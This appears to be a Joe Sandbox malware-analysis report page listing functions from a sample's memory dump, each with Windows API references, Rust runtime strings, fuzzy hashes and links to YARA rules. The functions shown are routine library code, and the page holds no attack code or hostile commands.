Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: assertion failed: count > 0$assertion failed: old_left_len >= count$assertion failed: old_right_len + count <= CAPACITY
API String ID: 3510742995-2932549692
Opcode ID: 47a30c832265b638aef33dcfffeb6675bd3e07f96e6d42be8c8ac99a844c7939
Instruction ID: 0059488e61a8187a6e7e3ab1376d53e8f1ddf1248b6f6d267ee2890cce6ff9fb
Opcode Fuzzy Hash: 47a30c832265b638aef33dcfffeb6675bd3e07f96e6d42be8c8ac99a844c7939
Instruction Fuzzy Hash: 5B510662B14A86D6EA01CB16E8413EA6331FB64BD8F544132EF4D8B761DF3CE256C304

Function 00007FF66E0E1050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32 ref: 00007FF66E0E1066
QueryPerformanceFrequency.KERNEL32 ref: 00007FF66E0E108E
GetLastError.KERNEL32 ref: 00007FF66E0E112C
GetLastError.KERNEL32 ref: 00007FF66E0E1167

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF66E0E1149, 00007FF66E0E1184

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: ErrorLastPerformanceQuery$CounterFrequency
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 2984914903-2333694755
Opcode ID: 0fc92a202f866277736bf4f14e2439d2252f4543df45f436f099e42cdca22039
Instruction ID: 8c9c93f7c3ac5b956fc5622fce41bee05d555ebf508aecf09526fdccbe72fedb
Opcode Fuzzy Hash: 0fc92a202f866277736bf4f14e2439d2252f4543df45f436f099e42cdca22039
Instruction Fuzzy Hash: 0241B221B09A86D5FF14DBA1D8013FA6376AFA4784F148132FD4D8B795EE3CA51AC304

Function 00007FF66E1FEE13 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E1FF06D
memcpy.MSVCRT ref: 00007FF66E1FF084
memcpy.MSVCRT ref: 00007FF66E1FF09A
memcpy.MSVCRT ref: 00007FF66E1FF0B1

Strings

assertion failed: std::ptr::eq(module, self.module().as_ref()), xrefs: 00007FF66E1FF3BD

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: assertion failed: std::ptr::eq(module, self.module().as_ref())
API String ID: 3510742995-3332592105
Opcode ID: 46b0bf2eb6231795dffbea40c71d4dd824a0e9f6defeac9abed55139fd2873c2
Instruction ID: c65cbc322d5f6b21bfe4f518f1a82709d231538a496efcae6d7cf12f07afd26e
Opcode Fuzzy Hash: 46b0bf2eb6231795dffbea40c71d4dd824a0e9f6defeac9abed55139fd2873c2
Instruction Fuzzy Hash: 49E1AE76608A85C2DB10DF29E4503AE77B1FB98B94F418222EF9D87795DF38E155C340

Function 00007FF66E01AB7D Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 202COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E01AC23
memcpy.MSVCRT ref: 00007FF66E01AD64

Strings

capacity overflow, xrefs: 00007FF66E01ADF4
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF66E01AE3D
Blockblockty, xrefs: 00007FF66E01AE71

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: Blockblockty$called `Result::unwrap()` on an `Err` value$capacity overflow
API String ID: 3510742995-2547643530
Opcode ID: e07d49cc9763389e28fd68a5723aeca13563728d0ba972e906dec6b70da4b873
Instruction ID: ff5cfb1c9cd3ec8dc5a823adff2e34c5e5ee45283e6d8a11426110edf32f9972
Opcode Fuzzy Hash: e07d49cc9763389e28fd68a5723aeca13563728d0ba972e906dec6b70da4b873
Instruction Fuzzy Hash: 0171C561B1964AC2EA10DB92E4107FA6370BB64BC8F648436EE4D8FB94DF3DD459D304

Function 00007FF66E0DEF50 Relevance: 7.6, APIs: 5, Instructions: 148COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF66E0DEFDD
WriteConsoleW.KERNEL32 ref: 00007FF66E0DF01C
WriteConsoleW.KERNEL32 ref: 00007FF66E0DF083
GetLastError.KERNEL32 ref: 00007FF66E0DF08C
GetLastError.KERNEL32 ref: 00007FF66E0DF11E

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: ConsoleErrorLastWrite$ByteCharMultiWide
String ID:
API String ID: 1956605914-0
Opcode ID: 0174804e2cb8242b60b5376a91a15f01f001060861c9e868f9c167998ac4849e
Instruction ID: 785284c736875edb20d2305727d59cf407a13e9dc9bc2a726e95ad9280d5f6cf
Opcode Fuzzy Hash: 0174804e2cb8242b60b5376a91a15f01f001060861c9e868f9c167998ac4849e
Instruction Fuzzy Hash: A551043AE08693C5F7308BA0D9043F9A665AB64394F588135F94C8FBD9EF7C92968344

Function 00007FF66E14ECC3 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E14EDD2
memcpy.MSVCRT ref: 00007FF66E14EDEB
memcpy.MSVCRT ref: 00007FF66E14EE3F

Strings

assertion failed: count > 0, xrefs: 00007FF66E14EE88
assertion failed: old_left_len + count <= CAPACITY, xrefs: 00007FF66E14EEA0

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: assertion failed: count > 0$assertion failed: old_left_len + count <= CAPACITY
API String ID: 3510742995-809906443
Opcode ID: 268946026f9baed49e16e20397957c74e4a343cc688bc1036f9603b63326911f
Instruction ID: 71e9426b5b0fd77f0370cc24f857b339bc4e9e904d2885d72161bceed516da90
Opcode Fuzzy Hash: 268946026f9baed49e16e20397957c74e4a343cc688bc1036f9603b63326911f
Instruction Fuzzy Hash: 9B5116A3B14A86D2EA45DB2199017E96335FB64BD8F844032EE0D9B395DF3CE256C304

Function 00007FF66E08ECF1 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 322COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E08EE10
memcpy.MSVCRT ref: 00007FF66E08F291

Strings

q, xrefs: 00007FF66E08EE37
q, xrefs: 00007FF66E08F1B3

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: q$q
API String ID: 3510742995-2090367865
Opcode ID: e9668355a17d0d515558e40f715793a6a583350318ce2310e99cbb8c71d532ed
Instruction ID: 3d64c809c718294ba6e6f958dd40e57a13a0b978d867cbc75936803a781a9a77
Opcode Fuzzy Hash: e9668355a17d0d515558e40f715793a6a583350318ce2310e99cbb8c71d532ed
Instruction Fuzzy Hash: 28F18922A08BC5D1EA21DB25E4043EA67B4FBA8784F404125EF8D4B79ADF3CE195C744

Function 00007FF66E090D1B Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 214COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E090E0D
memcpy.MSVCRT ref: 00007FF66E090F84

Strings

capacity overflow, xrefs: 00007FF66E091014
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF66E09105D

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: called `Result::unwrap()` on an `Err` value$capacity overflow
API String ID: 3510742995-2618782069
Opcode ID: bc6230688d1f7c20cf0553333cec2783f49253db0bd12588bbaded5aecac4d23
Instruction ID: 382b67e1fe52674cbfd1fe66fd3ba4521407c2118c802000ab0367e3904ed244
Opcode Fuzzy Hash: bc6230688d1f7c20cf0553333cec2783f49253db0bd12588bbaded5aecac4d23
Instruction Fuzzy Hash: 6D81E422B1D695C2EA109F21E4103AA6774FB64BC4F509432FE8D9BB95EF3DE456C304

Function 00007FF66E090A45 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 189COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E090AEB
memcpy.MSVCRT ref: 00007FF66E090C29

Strings

capacity overflow, xrefs: 00007FF66E090CB9
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF66E090D02

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: called `Result::unwrap()` on an `Err` value$capacity overflow
API String ID: 3510742995-2618782069
Opcode ID: a77158a3c9625c024ab7dbe5622da0647ccc9447491f8762f9beac6e9ff2ae10
Instruction ID: 22aaba1d10d23285ab6ea0d458415b6baa995a062e029f9e7cc0916739e3e09f
Opcode Fuzzy Hash: a77158a3c9625c024ab7dbe5622da0647ccc9447491f8762f9beac6e9ff2ae10
Instruction Fuzzy Hash: 8661F421B0D646C2EA109F12E9207BA6371FB64FC8F549032ED4D9FB84EE3DE4559304

Function 00007FF66E0547D8 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 189COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E05487E
memcpy.MSVCRT ref: 00007FF66E0549BC

Strings

capacity overflow, xrefs: 00007FF66E054A4C
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF66E054A95

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: called `Result::unwrap()` on an `Err` value$capacity overflow
API String ID: 3510742995-2618782069
Opcode ID: e6f88890d67f8a4f26f035c7d28eb947b7023010939778003f75515bb6290386
Instruction ID: d1791a3e43107b00f9a2337467b0dacd4bb3146d2939a3881030ffbc201cd673
Opcode Fuzzy Hash: e6f88890d67f8a4f26f035c7d28eb947b7023010939778003f75515bb6290386
Instruction Fuzzy Hash: 3161F532B09656D1EA509B12E9107FA6371BB60FC4F548136ED4E9FBC8DE3CD8669308

Function 00007FF66E14EAD3 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E14EB81
memcpy.MSVCRT ref: 00007FF66E14EBDD
memcpy.MSVCRT ref: 00007FF66E14EC23

Strings

assertion failed: new_left_len <= CAPACITY, xrefs: 00007FF66E14ECAA

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: assertion failed: new_left_len <= CAPACITY
API String ID: 3510742995-3316943531
Opcode ID: 8bba80f2815754e9c4253b3e9faa55bc9c5a43b8d4771924f0157607ad094928
Instruction ID: 3e2f14dcd0557bf60e95dca0dd374be3079975ecd80de3a59aebd38408eacfd4
Opcode Fuzzy Hash: 8bba80f2815754e9c4253b3e9faa55bc9c5a43b8d4771924f0157607ad094928
Instruction Fuzzy Hash: 8D41D1B2614A89D2EA00CB06E8017DAB325FB55BD8F944122EF4D4B765DF3CD265D344

Function 00007FF66E00EB41 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E00EBC0

Strings

capacity overflow, xrefs: 00007FF66E00EC6F
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF66E00ECB8

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: called `Result::unwrap()` on an `Err` value$capacity overflow
API String ID: 3510742995-2618782069
Opcode ID: 2af04e43dbcddd2b8dc461452a2f3f13179edd28f7ecec877da75dc1686b8899
Instruction ID: 1e959675dfdab65c5ee143828e458c938cbe4d1cf6632551c0cd6dd72c2e97ee
Opcode Fuzzy Hash: 2af04e43dbcddd2b8dc461452a2f3f13179edd28f7ecec877da75dc1686b8899
Instruction Fuzzy Hash: 6A41E2A1B09607C1FE559A12A9107BA5271AF25BC4F584432FC0D9F7C9DE3EF0579388

Function 00007FF66E00A997 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E00A9E2
memcpy.MSVCRT ref: 00007FF66E00AA8E

Strings

q, xrefs: 00007FF66E00AAA3
q, xrefs: 00007FF66E00AA47

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: q$q
API String ID: 3510742995-2090367865
Opcode ID: e0b4300398caa65ac6bd75f1a0ec808c8c99779582975709ecb00425748d395c
Instruction ID: d03baae47f41bdd7ea5181cafc522a22d6edc2d788d34fc50774fe0e32d2ca4d
Opcode Fuzzy Hash: e0b4300398caa65ac6bd75f1a0ec808c8c99779582975709ecb00425748d395c
Instruction Fuzzy Hash: 24319E22B08681D1EA10DF01E9457BEA375FB69BD0F948131EA8E4BAC6DF7CD199C344

Function 00007FF66E00C7CD Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E00C815
memcpy.MSVCRT ref: 00007FF66E00C8C5

Strings

q, xrefs: 00007FF66E00C8DA
q, xrefs: 00007FF66E00C87E

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: q$q
API String ID: 3510742995-2090367865
Opcode ID: bf8014ba56d7157f80f96e40d72bd30a7d97129636a1d5ad3400643cfaaf3685
Instruction ID: c58f24cc74bd226162311de8406277d1cac816d0476edfecc2f84301a605957e
Opcode Fuzzy Hash: bf8014ba56d7157f80f96e40d72bd30a7d97129636a1d5ad3400643cfaaf3685
Instruction Fuzzy Hash: 2E31A122B08681D1EA54DF11E5883BEA375FB59780F848232EF8D4B685DF7CD195C348

Function 00007FF66E102750 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF66E0DFF00: TlsGetValue.KERNEL32(?,?,00000000,?,00007FF66E10276B,?,?,?,?,-00000008,-00000006,00000001,?,00007FF66DFAAFC9), ref: 00007FF66E0DFF1B
Part of subcall function 00007FF66E0DFF00: TlsGetValue.KERNEL32(?,?,00000000,?,00007FF66E10276B,?,?,?,?,-00000008,-00000006,00000001,?,00007FF66DFAAFC9), ref: 00007FF66E0DFF38
Part of subcall function 00007FF66E0DFF00: TlsSetValue.KERNEL32(?,?,00000000,?,00007FF66E10276B,?,?,?,?,-00000008,-00000006,00000001,?,00007FF66DFAAFC9), ref: 00007FF66E0DFF80

WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,-00000008,-00000006,00000001,?,00007FF66DFAAFC9), ref: 00007FF66E10281A

Strings

cannot access a Thread Local Storage value during or after destruction/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\std\src\thread\local.rs, xrefs: 00007FF66E102845
lock count overflow in reentrant mutexlibrary\std\src\sync\reentrant_lock.rs, xrefs: 00007FF66E102861

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: Value$AddressSingleWake
